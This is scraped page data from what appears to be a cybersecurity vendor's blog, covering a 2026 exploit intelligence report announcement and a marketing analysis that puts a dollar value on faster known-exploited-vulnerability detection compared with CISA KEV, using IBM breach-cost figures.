.sQeA1, html code.shiki .sQeA1{--shiki-light:#90A4AE;--shiki-default:#005CC5;--shiki-dark:#79B8FF;--shiki-sepia:#AE81FF}",{"title":219,"searchDepth":220,"depth":220,"links":12102},[12103,12104,12108,12109,12110,12111],{"id":11647,"depth":220,"text":11648},{"id":11675,"depth":220,"text":11676,"children":12105},[12106,12107],{"id":11691,"depth":1266,"text":11692},{"id":11881,"depth":1266,"text":11882},{"id":11953,"depth":220,"text":11954},{"id":11984,"depth":220,"text":11985},{"id":1902,"depth":220,"text":1903},{"id":201,"depth":220,"text":202},"2026-03-02","Canary Intelligence captures thousands of real-world exploitation attempts every day, but scale alone does not create insight. This post walks through how clustering, structured feature extraction, and SiftRank transform raw exploitation telemetry into AI-driven prioritization. The result is a repeatable workflow that surfaces high-leverage attacker activity in minutes.",{"slug":12115},"siftrank_canaries","\u002Fblog\u002Fsiftrank_canaries",{"title":11640,"description":12113},"blog\u002Fsiftrank_canaries",[243,242,2941,1281,1279],"GMZQghYRl8nHUdqju_DzBAQZKq1yDUF25yNIlXIvI4Y",{"id":12122,"title":12123,"articles":12124,"authors":12202,"body":12205,"date":12128,"description":12333,"extension":234,"image":7,"link":7,"meta":12334,"navigation":237,"path":12335,"seo":12336,"series":7,"stem":12337,"subtype":7,"tags":12338,"__hash__":12339},"blog\u002Fblog\u002F2026-vulncheck-exploit-intelligence-report.md","Introducing the 2026 VulnCheck Exploit Intelligence Report",[12125,12129,12132,12136,12140,12143,12147,12151,12155,12160,12164,12168,12173,12177,12180,12185,12189,12194,12198],{"title":12126,"source":11228,"link":12127,"date":12128},"Vulnerabilities grew like weeds in 2025, but only 1% were weaponized in attacks","https:\u002F\u002Fcyberscoop.com\u002Fvulncheck-exploited-vulnerabilities-report-2025\u002F","2026-02-25",{"title":12130,"source":10841,"link":12131,"date":12128},"Software vulnerabilities are being weaponized faster than ever","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Fsoftware-vulnerabilities-are-being-weaponized-faster-than-ever\u002F813096\u002F",{"title":12133,"source":12134,"link":12135,"date":12128},"Only one percent of vulnerabilities were actually exploited last year","BetaNews","https:\u002F\u002Fbetanews.com\u002Farticle\u002Fonly-one-percent-of-vulnerabilities-were-actually-exploited-last-year\u002F",{"title":12130,"source":12137,"link":12138,"date":12139},"CIO Dive","https:\u002F\u002Fwww.ciodive.com\u002Fnews\u002Fsoftware-vulnerabilities-are-being-weaponized-faster-than-ever\u002F813142\u002F","2026-02-26",{"title":12130,"source":12141,"link":12142,"date":12139},"Yahoo!News","https:\u002F\u002Fwww.yahoo.com\u002Fnews\u002Farticles\u002Fsoftware-vulnerabilities-being-weaponized-faster-112650248.html?guccounter=2",{"title":12144,"source":12145,"link":12146,"date":12139},"Report Finds Just 1% of Security Flaws Drive Most Cyberattacks in 2025","HackRead","https:\u002F\u002Fhackread.com\u002F1-security-flaws-drive-cyberattacks-2025-report\u002F",{"title":12148,"source":12149,"link":12150,"date":12139},"VulnCheck finds ransomware operators increasingly relying on zero-days, raising risk in OT environments","Industrial Cyber","https:\u002F\u002Findustrialcyber.co\u002Fransomware\u002Fvulncheck-finds-ransomware-operators-increasingly-relying-on-zero-days-raising-risk-in-ot-environments\u002F",{"title":12152,"source":12153,"link":12154,"date":12139},"Expert: Vulnerability prioritization is a persistent problem","SC Magazine","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fexpert-vulnerability-prioritization-is-a-persistent-problem",{"title":12156,"source":12157,"link":12158,"date":12159},"Risky Bulletin: Russian man investigated for extorting Conti ransomware group","RiskyBiz","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-russian-man-investigated-for-extorting-conti-ransomware-group\u002F","2026-02-27",{"title":12161,"source":12162,"link":12163,"date":12159},"News brief: Attackers gain speed in cybersecurity race","TechTarget","https:\u002F\u002Fwww.techtarget.com\u002Fsearchsecurity\u002Fnews\u002F366639638\u002FNews-brief-Attackers-gain-speed-in-cybersecurity-race",{"title":12165,"source":12166,"link":12167,"date":12112},"Report separates real-world exploitation trends from theoretical vulnerabilities","Homeland Preparedness News","https:\u002F\u002Fhomelandprepnews.com\u002Fstories\u002F83993-report-separates-real-world-exploitation-trends-from-theoretical-vulnerabilities\u002F",{"title":12169,"source":12170,"link":12171,"date":12172},"Security Now 1067 | KongTuke's CrashFix | Episode 1067","This Week In Tech (TWIT) Security Now Podcast","https:\u002F\u002Ftwit.tv\u002Fshows\u002Fsecurity-now\u002Fepisodes\u002F1067","2026-03-03",{"title":12174,"source":3508,"link":12175,"date":12176},"The Zero Day Clock Is Ticking: Why the Collapse of Exploitation Timelines Changes Everything","https:\u002F\u002Fwww.resilientcyber.io\u002Fp\u002Fthe-zero-day-clock-is-ticking-why","2026-03-05",{"title":12178,"source":11218,"link":12179,"date":12176},"Cisco Drops 48 New Firewall Vulnerabilities, 2 Critical","https:\u002F\u002Fwww.darkreading.com\u002Fvulnerabilities-threats\u002Fcisco-48-firewall-vulnerabilities-2-critical",{"title":12181,"source":12182,"link":12183,"date":12184},"Zero-day exploits hit enterprises faster and harder","CSO Online","https:\u002F\u002Fwww.csoonline.com\u002Farticle\u002F4141519\u002Fzero-day-exploits-hit-enterprises-faster-and-harder.html","2026-03-06",{"title":12186,"source":12187,"link":12188,"date":12184},"Reevaluating vulnerability managemen","The Defenders Initiative","https:\u002F\u002Fwww.defendersinitiative.com\u002Fp\u002Freevaluating-vulnerability-management",{"title":12190,"source":12191,"link":12192,"date":12193},"The Wild, Wild World of Exploits With Caitlin Condon","Decipher","https:\u002F\u002Fdecipher.sc\u002Fvideos\u002Fthe-wild-wild-world-of-exploits-with-caitlin-condon\u002F","2026-03-10",{"title":12195,"source":12196,"link":12197,"date":4172},"Security pros see Anthropic’s AI assistance as boost for bug fixers—mostly","IT Brew","https:\u002F\u002Fwww.itbrew.com\u002Fstories\u002F2026\u002F04\u002F09\u002Fsecurity-pros-see-anthropic-s-ai-assistance-as-boost-for-bug-fixers-mostly",{"title":12199,"source":12200,"link":12201,"date":3483},"NIST narrows scope of CVE analysis to keep up with rising tide of vulnerabilities","Cyber Scoop","https:\u002F\u002Fcyberscoop.com\u002Fnist-narrows-cve-analysis-nvd\u002F",[12203],{"name":256,"link":258,"avatar":257,"linkName":12204},"LinkedIn",{"type":15,"value":12206,"toc":12329},[12207,12210,12213,12219,12225,12231,12234,12282,12286,12295,12301,12307,12309,12312],[18,12208,12209],{},"Global organizations still struggle with basic ground truth on vulnerabilities and risk. Vulnerability and exploit information, on the whole, is still unstructured, fragmented, and opaque, with most threat notifications trailing real-world risk by days, weeks, or longer in spite of increased spending on early warning systems and “enterprise-grade” tooling. In other words, the threat ceiling has risen noticeably for defensive practitioners and front-line operators, but the industry baseline for reliable, high-quality data has arguably not only not risen — it’s falling.",[18,12211,12212],{},"At VulnCheck, we believe that data quality and consumability are solvable problems, and that timely exploit intelligence should be accessible to everyone.",[18,12214,12215],{},[68,12216],{"alt":12217,"src":12218},"2026 Exploit Intelligence Report","\u002Fveir\u002Fbanner.png",[18,12220,12221,12222,12224],{},"Today, we are proud to announce the release of a new annual research report: The ",[295,12223,1212],{}," draws on 500+ data sources to build an evidence-based picture of vulnerability and exploit trends from the past year, incorporating first-party analysis from our research teams in addition to broad coverage of open-source and other security intelligence.",[10872,12226],{"className":12227,"label":12229,"to":12230,"variant":10883,":external":10874,"target":10881},[10876,10877,12228,10879],"w-42","Download the report","https:\u002F\u002Fwwv.vulncheck.com\u002F2026-vulncheck-exploit-intelligence-report",[18,12232,12233],{},"Key report findings include:",[22,12235,12236,12247,12261,12268,12279],{},[25,12237,12238,12239,12242,12243,12246],{},"VulnCheck tracked ",[295,12240,12241],{},"14,000+ exploits"," developed for 10,000+ unique “CVE-2025” vulnerabilities, a ",[295,12244,12245],{},"16.5% YoY increase"," in same-year CVE exploit coverage. This rise has been driven in part by an uptick in AI-generated PoC code, much of which is non-functional or outright fake. Despite the prevalence of public PoCs, a mere 1% of 2025 CVEs were exploited in the wild by the end of the year.",[25,12248,12249,12252,12253,12256,12257,12260],{},[295,12250,12251],{},"884 vulnerabilities"," were added to VulnCheck’s industry-leading Known Exploited Vulnerabilities (KEV) dataset in 2025. ",[295,12254,12255],{},"47.7%"," of VulnCheck KEVs in 2025 were ",[295,12258,12259],{},"CVEs with 2025 identifiers",", underscoring the speed with which adversaries weaponize and deploy exploits for recent vulnerabilities.",[25,12262,12263,12264,12267],{},"There was a small decrease (-13%) in new vulnerabilities linked to ",[295,12265,12266],{},"named state-sponsored threat groups"," and APTs over the course of 2025. New CVE exploits attributed to China-nexus groups increased while Iranian exploit activity fell.",[25,12269,12270,12271,12274,12275,12278],{},"Only a small number of new vulnerabilities were leveraged in known ransomware incidents in 2025, but ",[295,12272,12273],{},"56.4%"," of 2025 ransomware CVEs were discovered as a result of ",[295,12276,12277],{},"zero-day exploitation",", and a third of known 2025 ransomware CVEs still had no public or commercial exploits available as of January 2026.",[25,12280,12281],{},"Deep dives on individual threat actor techniques and CVE exploits: Read in-depth analysis of Earth Lamia (China), RomCom (Russia), Cl0p, DragonForce Ransomware Cartel, and the RondoDox botnet.",[61,12283,12285],{"id":12284},"_2025-routinely-targeted-vulnerabilities","2025 Routinely Targeted Vulnerabilities",[18,12287,12288,12289,982,12292,12294],{},"We’re also pleased to announce the first annual list of VulnCheck Routinely Targeted Vulnerabilities. Our team identified 50 CVEs ",[295,12290,12291],{},"disclosed",[295,12293,970],{}," in 2025 that have elevated, multi-dimensional threat profiles. We’re releasing that list of Routinely Targeted Vulnerabilities and associated metadata to the community along with this report so readers can explore the data themselves.",[10872,12296],{"className":12297,"label":12299,"to":12300,"variant":10883},[10876,10877,12298,10879],"w-32","See the full list","\u002F2025-routinely-targeted-vulnerabilities",[18,12302,12303],{},[68,12304],{"alt":12305,"src":12306},"Top 10 CVEs 2025","\u002Fveir\u002Ftop-10-cves-2025.png",[61,12308,202],{"id":201},[18,12310,12311],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus.",[18,12313,1228,12314,1234,12317,1240,12320,1246,12323,1255,12326,1260],{},[47,12315,1233],{"href":12316},"\u002Fkev",[47,12318,1239],{"href":1237,"rel":12319},[51],[47,12321,1245],{"href":1243,"rel":12322},[51],[47,12324,1251],{"href":1249,"rel":12325},[51],[47,12327,216],{"href":1258,"rel":12328},[51],{"title":219,"searchDepth":220,"depth":220,"links":12330},[12331,12332],{"id":12284,"depth":220,"text":12285},{"id":201,"depth":220,"text":202},"In-depth analysis of 2025 CVEs and exploit trends from VulnCheck’s research team. The 2026 Exploit Intelligence Report includes an evaluation of the public exploit ecosystem, ransomware and state-sponsored threat actor deep dives, and a data-driven list of 2025’s routinely targeted vulnerabilities.",{},"\u002Fblog\u002F2026-vulncheck-exploit-intelligence-report",{"title":12123,"description":12333},"blog\u002F2026-vulncheck-exploit-intelligence-report",[242,1281,1279,1280],"I9Sr6hm7PM0nnJ1IBqzVmFh5pyGHPTxXdZA22tg-ZGA",{"id":12341,"title":12342,"articles":7,"authors":12343,"body":12349,"date":13170,"description":13171,"extension":234,"image":7,"link":7,"meta":13172,"navigation":237,"path":13173,"seo":13174,"series":7,"stem":13175,"subtype":7,"tags":13176,"__hash__":13177},"blog\u002Fblog\u002Feconomic-value-lead-time.md","What 28 Days of Faster Vulnerability Intelligence Is Worth",[12344],{"name":12345,"avatar":12346,"link":12347,"linkName":12348},"Tanner Embry","https:\u002F\u002Fca.slack-edge.com\u002FT02P16KHNRY-U098F45C9LN-0f0aecbaf7a6-72","https:\u002F\u002Fwww.linkedin.com\u002Fin\u002Ftannerembry\u002F","in\u002Ftannerembry\u002F",{"type":15,"value":12350,"toc":13145},[12351,12353,12379,12381,12384,12387,12391,12394,12402,12405,12411,12414,12418,12489,12495,12501,12508,12514,12520,12524,12527,12553,12556,12560,12567,12570,12574,12616,12621,12625,12676,12680,12725,12730,12733,12737,12788,12794,12799,12803,12814,12817,12820,12846,12849,12852,12884,12895,12899,12902,12908,12915,12918,12922,12925,12929,12932,12937,12941,12952,12957,12960,12964,12978,12983,12987,12990,13003,13015,13022,13032,13038,13045,13049,13052,13078,13082,13087,13090,13096,13099,13103,13114,13117,13120],[61,12352,20],{"id":3520},[22,12354,12355,12362,12369,12376],{},[25,12356,12357,12358,12361],{},"VulnCheck identifies exploited vulnerabilities ",[295,12359,12360],{},"28.13 days faster"," than CISA KEV on average",[25,12363,12364,12365,12368],{},"Of 376 CVEs in both catalogs during 2024-2025, ",[295,12366,12367],{},"VulnCheck had meaningful lead time in 67.6% of cases",", with an average lead of 41.64 days when ahead",[25,12370,12371,12372,12375],{},"Using IBM's 2025 Cost of a Data Breach data, that speed advantage translates to ",[295,12373,12374],{},"$518,000 in risk avoided per incident"," when organizations can act on it",[25,12377,12378],{},"A major financial institution validated this independently. Their internal analysis found VulnCheck was 6.3 days faster than their existing tools, worth $145,000 per incident in their environment",[1308,12380],{},[18,12382,12383],{},"When we talk about vulnerability intelligence, speed matters. But how much is faster awareness actually worth, and what does it take to turn that awareness into action?",[18,12385,12386],{},"We set out to answer those questions by combining two datasets: our own analysis of VulnCheck KEV versus CISA KEV timing, and IBM's 2025 Cost of a Data Breach Report. The result is a framework for quantifying the economic value of faster vulnerability intelligence.",[61,12388,12390],{"id":12389},"vulncheck-kev-vs-cisa-kev-the-data","VulnCheck KEV vs. CISA KEV: The Data",[18,12392,12393],{},"We analyzed every CVE that appeared in both the VulnCheck KEV and CISA KEV catalogs where VulnCheck's addition date fell within 2024 or 2025. The methodology was straightforward:",[18,12395,12396,10515,12399],{},[295,12397,12398],{},"Metric:",[886,12400,12401],{},"difference_days = cisa_date_added - vulncheck_date_added",[18,12403,12404],{},"A positive number means VulnCheck had the CVE first.",[18,12406,12407],{},[68,12408],{":width":10862,"alt":12409,"src":12410},"VulnCheck vs CISA KEV Breakdown","\u002Fblog\u002Feconomic-value-lead-time\u002Fvulncheck-cisa-breakdown.png",[18,12412,12413],{},"In two-thirds of cases, VulnCheck had the CVE cataloged as known exploited before CISA added it, often by weeks or months.",[993,12415,12417],{"id":12416},"lead-time-statistics","Lead Time Statistics",[307,12419,12420,12433],{},[310,12421,12422],{},[313,12423,12424,12427,12430],{},[316,12425,12426],{},"Stat",[316,12428,12429],{},"All 376 CVEs",[316,12431,12432],{},"Only when VulnCheck was first (n=254)",[336,12434,12435,12446,12457,12468,12478],{},[313,12436,12437,12440,12443],{},[341,12438,12439],{},"Mean",[341,12441,12442],{},"28.13 days",[341,12444,12445],{},"41.64 days",[313,12447,12448,12451,12454],{},[341,12449,12450],{},"Median",[341,12452,12453],{},"3 days",[341,12455,12456],{},"7 days",[313,12458,12459,12462,12465],{},[341,12460,12461],{},"Min",[341,12463,12464],{},"0 days",[341,12466,12467],{},"1 day",[313,12469,12470,12473,12476],{},[341,12471,12472],{},"Max",[341,12474,12475],{},"567 days",[341,12477,12475],{},[313,12479,12480,12483,12486],{},[341,12481,12482],{},"Std Dev",[341,12484,12485],{},"71.63 days",[341,12487,12488],{},"83.90 days",[18,12490,12491,12492,12494],{},"The mean of 28.13 days across all CVEs is the headline number. But when VulnCheck was first, the average lead time was actually ",[295,12493,12445],{},": over a month of earlier awareness.",[18,12496,12497],{},[68,12498],{":width":10862,"alt":12499,"src":12500},"Lead Time Distribution","\u002Fblog\u002Feconomic-value-lead-time\u002Flead-time-distribution.png",[18,12502,12503,12504,12507],{},"The bulk (54.8%) are within a week. But the long tail is significant: ",[295,12505,12506],{},"nearly 27% of VulnCheck-first entries had a lead of over 30 days."," These are the cases where organizations relying solely on CISA KEV were flying blind for a month or more.",[18,12509,12510],{},[68,12511],{":width":10862,"alt":12512,"src":12513},"Timeline Comparison","\u002Fblog\u002Feconomic-value-lead-time\u002Fcve-timeline-comparison.png",[18,12515,12516,12517],{},"The CrushFTP and Citrix examples are particularly notable. These are well-known, actively exploited vulnerabilities where VulnCheck had them cataloged ",[295,12518,12519],{},"9-11 months before CISA.",[61,12521,12523],{"id":12522},"why-the-difference","Why the Difference?",[18,12525,12526],{},"VulnCheck's earlier detection comes from several factors:",[1789,12528,12529,12535,12541,12547],{},[25,12530,12531,12534],{},[295,12532,12533],{},"Broader source coverage:"," VulnCheck monitors over 500 sources for exploitation evidence, including exploit repositories, threat actor infrastructure, and global security research",[25,12536,12537,12540],{},[295,12538,12539],{},"Automated detection:"," Continuous monitoring versus manual curation processes",[25,12542,12543,12546],{},[295,12544,12545],{},"Lower publication threshold:"," VulnCheck adds vulnerabilities based on any confirmed exploitation evidence, while CISA applies additional criteria",[25,12548,12549,12552],{},[295,12550,12551],{},"Real-time updates:"," Multiple daily updates versus periodic batch additions",[18,12554,12555],{},"CISA KEV serves an important purpose. It's an authoritative, government-backed catalog with mandated remediation timelines for federal agencies. But it was designed for compliance, not speed.",[61,12557,12559],{"id":12558},"translating-speed-to-dollars","Translating Speed to Dollars",[18,12561,12562,12563,12566],{},"Knowing VulnCheck is faster is useful. Knowing what that speed is ",[1131,12564,12565],{},"worth"," is actionable.",[18,12568,12569],{},"IBM's Cost of a Data Breach Report 2025 provides the data we need to build a financial model.",[993,12571,12573],{"id":12572},"the-cost-of-time","The Cost of Time",[307,12575,12576,12586],{},[310,12577,12578],{},[313,12579,12580,12583],{},[316,12581,12582],{},"Breach Lifecycle",[316,12584,12585],{},"Average Cost (2025)",[336,12587,12588,12596,12604],{},[313,12589,12590,12593],{},[341,12591,12592],{},"Under 200 days",[341,12594,12595],{},"$3.87 million",[313,12597,12598,12601],{},[341,12599,12600],{},"Over 200 days",[341,12602,12603],{},"$5.01 million",[313,12605,12606,12611],{},[341,12607,12608],{},[295,12609,12610],{},"Differential",[341,12612,12613],{},[295,12614,12615],{},"$1.14 million",[18,12617,12618],{},[1131,12619,12620],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 12, p. 19",[993,12622,12624],{"id":12623},"daily-exposure-cost","Daily Exposure Cost",[307,12626,12627,12638],{},[310,12628,12629],{},[313,12630,12631,12634,12636],{},[316,12632,12633],{},"Data Point",[316,12635,2750],{},[316,12637,2468],{},[336,12639,12640,12651,12662],{},[313,12641,12642,12645,12648],{},[341,12643,12644],{},"Global Average Breach Cost",[341,12646,12647],{},"$4.44 million",[341,12649,12650],{},"IBM 2025, p. 10",[313,12652,12653,12656,12659],{},[341,12654,12655],{},"Average Breach Lifecycle",[341,12657,12658],{},"241 days",[341,12660,12661],{},"IBM 2025, p. 17",[313,12663,12664,12668,12673],{},[341,12665,12666],{},[295,12667,12624],{},[341,12669,12670],{},[295,12671,12672],{},"$18,423\u002Fday",[341,12674,12675],{},"Calculated",[993,12677,12679],{"id":12678},"vulnerability-exploitation-context","Vulnerability Exploitation Context",[307,12681,12682,12691],{},[310,12683,12684],{},[313,12685,12686,12689],{},[316,12687,12688],{},"Metric",[316,12690,2750],{},[336,12692,12693,12701,12709,12717],{},[313,12694,12695,12698],{},[341,12696,12697],{},"Percentage of breaches from vulnerability exploitation",[341,12699,12700],{},"11%",[313,12702,12703,12706],{},[341,12704,12705],{},"Average cost of vulnerability-initiated breach",[341,12707,12708],{},"$4.24 million",[313,12710,12711,12714],{},[341,12712,12713],{},"Average time to identify and contain",[341,12715,12716],{},"245 days",[313,12718,12719,12722],{},[341,12720,12721],{},"Zero-day vulnerability lifecycle (MTTI + MTTC)",[341,12723,12724],{},"252 days",[18,12726,12727],{},[1131,12728,12729],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 10, p. 18",[18,12731,12732],{},"That 252-day figure for zero-day vulnerabilities is critical. This is precisely where earlier intelligence provides maximum value.",[61,12734,12736],{"id":12735},"the-financial-impact-of-28-days","The Financial Impact of 28 Days",[307,12738,12739,12752],{},[310,12740,12741],{},[313,12742,12743,12746,12749],{},[316,12744,12745],{},"Scenario",[316,12747,12748],{},"Lead Time",[316,12750,12751],{},"Risk Avoided per Incident",[336,12753,12754,12766,12776],{},[313,12755,12756,12759,12761],{},[341,12757,12758],{},"VulnCheck vs. CISA KEV (mean)",[341,12760,12442],{},[341,12762,12763],{},[295,12764,12765],{},"$518,276",[313,12767,12768,12771,12773],{},[341,12769,12770],{},"VulnCheck vs. CISA KEV (median)",[341,12772,12453],{},[341,12774,12775],{},"$55,269",[313,12777,12778,12781,12783],{},[341,12779,12780],{},"When VulnCheck was first (mean)",[341,12782,12445],{},[341,12784,12785],{},[295,12786,12787],{},"$767,110",[18,12789,12790],{},[68,12791],{":width":10862,"alt":12792,"src":12793},"Risk Avoided by Incident Count","\u002Fblog\u002Feconomic-value-lead-time\u002Fannual-risk-avoided.png",[18,12795,12796],{},[1131,12797,12798],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 3, p. 11",[61,12800,12802],{"id":12801},"knowing-is-step-one-acting-is-where-the-value-is","Knowing Is Step One. Acting Is Where the Value Is",[18,12804,12805,12806,12809,12810,12813],{},"The $518K isn't saved by ",[1131,12807,12808],{},"knowing"," 28 days earlier. It's saved by ",[1131,12811,12812],{},"acting"," 28 days earlier.",[18,12815,12816],{},"VulnCheck KEV is free because awareness is table stakes. It answers the question: \"Is this vulnerability being exploited in the wild?\" That's essential, but it's just the starting line.",[18,12818,12819],{},"The harder questions are:",[22,12821,12822,12828,12834,12840],{},[25,12823,12824,12827],{},[295,12825,12826],{},"How is it being exploited?"," Is there weaponized code? A Metasploit module? Ransomware integration?",[25,12829,12830,12833],{},[295,12831,12832],{},"Who is exploiting it?"," Nation-state? Financially motivated? Opportunistic scanning?",[25,12835,12836,12839],{},[295,12837,12838],{},"Can I detect it?"," Do I have signatures ready to deploy, or am I writing them from scratch?",[25,12841,12842,12845],{},[295,12843,12844],{},"Am I exposed?"," Is this vulnerability even in my environment?",[18,12847,12848],{},"Answering those questions manually across 550+ sources is where security teams burn 60-100 hours per week. That's 2-4 FTEs worth of effort just to stay current.",[18,12850,12851],{},"VulnCheck's platform provides:",[22,12853,12854,12860,12866,12872,12878],{},[25,12855,12856,12859],{},[295,12857,12858],{},"Exploit intelligence",": PoC code, weaponization status, exploit maturity, and timelines",[25,12861,12862,12865],{},[295,12863,12864],{},"Detection artifacts",": Production-ready Suricata, Snort, YARA, and Sigma rules, along with full packet captures (PCAPs) of real exploit traffic, vulnerable Docker containers for testing detection stacks, and in-house exploits developed by VulnCheck's research team via the Go-Exploit framework",[25,12867,12868,12871],{},[295,12869,12870],{},"Canary intelligence",": A global network of intentionally vulnerable instances that capture real attacker payloads in the wild — providing first-party IOCs, encoded commands, file hashes, and delivery mechanisms that feed directly back into detection engineering and threat intelligence enrichment",[25,12873,12874,12877],{},[295,12875,12876],{},"Threat actor attribution",": Which groups are actively using the exploit, with ties to ransomware families and botnet campaigns",[25,12879,12880,12883],{},[295,12881,12882],{},"Attack surface queries",": Check exposure across Shodan, Censys, FOFA, ZoomEye, and GreyNoise",[18,12885,12886,12887,12890,12891,12894],{},"KEV tells you ",[1131,12888,12889],{},"what"," to prioritize. The platform tells you ",[1131,12892,12893],{},"how"," to act on it. That's where the 28-day advantage translates into actual risk reduction.",[61,12896,12898],{"id":12897},"real-world-validation","Real-World Validation",[18,12900,12901],{},"We recently worked with a major financial institution in the APAC region that wanted to validate our claims with their own data.",[18,12903,12904,12905],{},"Their security team ran an independent analysis comparing VulnCheck KEV against their current internal vulnerability intelligence sources across 10 recently exploited CVEs. Their finding: ",[295,12906,12907],{},"VulnCheck was 6.3 days faster on average.",[18,12909,12910,12911,12914],{},"Using the financial services daily exposure cost of $23,070, that translates to ",[295,12912,12913],{},"$145,341 in risk avoided per incident",", and over $700,000 annually at typical incident frequencies.",[18,12916,12917],{},"The 6.3-day figure is lower than our 28.13-day CISA KEV comparison because this institution already has mature vulnerability intelligence capabilities. VulnCheck still provided meaningful acceleration even against a sophisticated baseline. Organizations using CISA KEV as their primary source would see significantly larger gains.",[61,12919,12921],{"id":12920},"the-broader-context-why-this-matters-now","The Broader Context: Why This Matters Now",[18,12923,12924],{},"Three trends from the 2025 IBM report make faster vulnerability intelligence increasingly critical:",[993,12926,12928],{"id":12927},"_1-attackers-are-accelerating","1. Attackers are accelerating",[18,12930,12931],{},"16% of breaches in 2025 involved attackers using AI, with 37% of those involving AI-generated phishing and 35% involving deepfake attacks. As adversaries leverage AI to identify and exploit vulnerabilities faster, defenders need automation to maintain parity.",[18,12933,12934],{},[1131,12935,12936],{},"Source: IBM Cost of a Data Breach Report 2025, pp. 46-47",[993,12938,12940],{"id":12939},"_2-the-skills-gap-is-widening","2. The skills gap is widening",[18,12942,12943,12944,12947,12948,12951],{},"48% of organizations reported high levels of security skills shortage. Organizations with high shortages paid ",[295,12945,12946],{},"$5.22 million"," per breach versus ",[295,12949,12950],{},"$3.65 million"," for those with adequate staffing, a $1.57 million differential.",[18,12953,12954],{},[1131,12955,12956],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 42, p. 45",[18,12958,12959],{},"You can't hire your way out of this problem. Automation and better intelligence are the only paths that scale.",[993,12961,12963],{"id":12962},"_3-ai-and-automation-deliver-proven-roi","3. AI and automation deliver proven ROI",[18,12965,12966,12967,12970,12971,12974,12975,59],{},"Organizations using AI and automation extensively had an average breach cost of ",[295,12968,12969],{},"$3.62 million"," versus ",[295,12972,12973],{},"$5.52 million"," for those without, a ",[295,12976,12977],{},"$1.9 million savings",[18,12979,12980],{},[1131,12981,12982],{},"Source: IBM Cost of a Data Breach Report 2025, Figure 44, p. 47",[61,12984,12986],{"id":12985},"methodology-notes","Methodology Notes",[18,12988,12989],{},"We make a strong effort to be transparent about our research. Here's how this analysis was conducted:",[18,12991,12992,12995,12996,8659,12999,13002],{},[295,12993,12994],{},"Data source:"," VulnCheck KEV export, which contains both the VulnCheck ",[886,12997,12998],{},"date_added",[886,13000,13001],{},"cisa_date_added"," fields for each entry",[18,13004,13005,13008,13009,13011,13012,13014],{},[295,13006,13007],{},"Filter criteria:"," Only entries where VulnCheck's ",[886,13010,12998],{}," is in 2024 or 2025, AND a ",[886,13013,13001],{}," value exists",[18,13016,13017,10515,13019,13021],{},[295,13018,12398],{},[886,13020,12401],{}," (positive = VulnCheck was first)",[18,13023,13024,13027,13028,13031],{},[295,13025,13026],{},"Important note on scope:"," This analysis only includes CVEs that appear in ",[1131,13029,13030],{},"both"," catalogs. VulnCheck KEV contains many additional vulnerabilities with confirmed exploitation evidence that have not yet been added to CISA KEV. Those are excluded from this comparison but represent additional coverage VulnCheck provides.",[18,13033,13034,13037],{},[295,13035,13036],{},"IBM data:"," All breach cost figures are from IBM Security & Ponemon Institute's Cost of a Data Breach Report 2025, with specific page and figure citations provided.",[18,13039,13040,13041,13044],{},"You can validate our KEV comparison yourself using ",[47,13042,1233],{"href":2871,"rel":13043},[51],", which is available as a free community resource.",[61,13046,13048],{"id":13047},"considerations","Considerations",[18,13050,13051],{},"A few caveats to keep in mind:",[1789,13053,13054,13060,13066,13072],{},[25,13055,13056,13059],{},[295,13057,13058],{},"Lead time does not equal exploit time."," VulnCheck's earlier addition date reflects when exploitation evidence became available, not necessarily when exploitation began. However, earlier awareness still accelerates defender response.",[25,13061,13062,13065],{},[295,13063,13064],{},"Daily exposure is a model."," The $18,423\u002Fday figure is derived from averages. Actual costs vary by organization size, industry, geography, and incident specifics.",[25,13067,13068,13071],{},[295,13069,13070],{},"Not all incidents are equal."," Some exploitation events result in full breaches; others are detected and contained quickly. The financial model assumes the vulnerability was a contributing factor to a breach-level incident.",[25,13073,13074,13077],{},[295,13075,13076],{},"The comparison is against CISA KEV specifically."," Organizations using other commercial threat intelligence sources may see different results. The financial institution example (6.3 days) demonstrates this variance.",[61,13079,13081],{"id":13080},"the-bottom-line","The Bottom Line",[18,13083,12357,13084,13086],{},[295,13085,12360],{}," than CISA KEV on average. In two-thirds of cases, VulnCheck had meaningful lead time, often weeks or months ahead.",[18,13088,13089],{},"That speed advantage, when paired with the intelligence to act on it, translates to real money:",[18,13091,13092],{},[68,13093],{":width":10862,"alt":13094,"src":13095},"Risk Avoided by Industry","\u002Fblog\u002Feconomic-value-lead-time\u002Frisk-avoided-by-industry.png",[18,13097,13098],{},"Knowing earlier only matters if you can act earlier. When you're in a race against attackers, that's the difference between containing a threat and becoming a headline.",[61,13100,13102],{"id":13101},"learn-more","Learn More",[18,13104,13105,13108,13109,59],{},[47,13106,1233],{"href":2871,"rel":13107},[51]," is available as a free community resource for tracking exploited vulnerabilities. If you're looking to move beyond awareness into action, with exploit intelligence, detection artifacts, and attack surface visibility, ",[47,13110,13113],{"href":13111,"rel":13112},"https:\u002F\u002Fwwv.vulncheck.com\u002Fdemo-request",[51],"explore the full VulnCheck platform",[18,13115,13116],{},"The full Economic Impact Report, including detailed methodology and industry-specific calculations, is available upon request.",[61,13118,13119],{"id":10520},"Sources",[1789,13121,13122,13129,13136],{},[25,13123,13124,13125,13128],{},"IBM Security & Ponemon Institute. (2025). ",[1131,13126,13127],{},"Cost of a Data Breach Report 2025."," pp. 10-11, 17-19, 45-47.",[25,13130,13131,13132,13135],{},"VulnCheck. (2025). ",[1131,13133,13134],{},"VulnCheck KEV vs. CISA KEV Analysis, 2024-2025."," Internal analysis.",[25,13137,13131,13138,10515,13141],{},[1131,13139,13140],{},"2024 Trends in Vulnerability 